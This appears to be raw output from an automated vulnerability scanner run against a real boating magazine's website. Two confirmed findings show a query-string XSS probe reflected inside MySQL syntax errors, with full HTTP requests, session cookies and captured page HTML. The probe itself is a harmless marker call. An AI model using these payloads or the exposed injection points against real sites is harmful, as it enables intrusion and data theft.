Irwin 43 MK II" /> <meta name="title" content="Irwin 43 Mk II" /> <meta name="author" content="Steve Knauth" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Irwin 43 Mk II</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_used_boat_review m_used_boat_review"><!--
Type of page: article<br />Section: 6, s_boat_shop<br />Category: 53, c_used_boat_review<br />Menu: 63, m_used_boat_review-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publica..
- /boat-shop/on-powerboats/272522-columbia-the-gem-of-rock-harbor

/boat-shop/on-powerboats/272522-columbia-the-gem-of-rock-harbor CONFIRMED

http://www.soundingsonline.com/boat-shop/on-powerboats/272522-columbia-the-gem-of-rock-harbor?'%22--..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0023F3)</script>

Request

GET /boat-shop/on-powerboats/272522-columbia-the-gem-of-rock-harbor?'"--></style></script><script>netsparker(0x0023F3)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023F3)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023F3)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/on-powerboats/272522-columbia-the-gem-of-rock-harbor" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Print magazine January 2011
Columbia
Rock Harbor
Fishing" /> <meta name="title" content="Columbia: the gem of Rock Harbor" /> <meta name="author" content="Eric Sorensen" /> <meta name="description" content="Rebuilt after a half-century of hard fishing in Cape Cod Bay, the 43-footer is ready for the next 50 years" /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Columbia: the gem of Rock Harbor</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_on_powerboats m_on_powerboats"><!--
Type of page: article<br />Section: 6, s_boat_shop<br />Category: 49, c_on_powerboats<br />Menu: 81, m_on_powerboats-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital Publications</span></a></li><li class="item104"><a href="/archives"><span>Archives</span></a></li><li class="item232&..
- /boat-shop/sea-savvy/272552-you-can-look-the-part-or-look-like-me

/boat-shop/sea-savvy/272552-you-can-look-the-part-or-look-like-me CONFIRMED

http://www.soundingsonline.com/boat-shop/sea-savvy/272552-you-can-look-the-part-or-look-like-me?'%22..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0023EA)</script>

Request

GET /boat-shop/sea-savvy/272552-you-can-look-the-part-or-look-like-me?'"--></style></script><script>netsparker(0x0023EA)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023EA)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023EA)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/sea-savvy/272552-you-can-look-the-part-or-look-like-me" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Print magazine January 2011
sailing clothes
Sea Savvy" /> <meta name="title" content="You can look the part - or look like me" /> <meta name="author" content="Tom Neale" /> <meta name="description" content="When it comes to clothing, what matters most is that it prepares you for emergencies, not catwalks" /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>You can look the part - or look like me</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
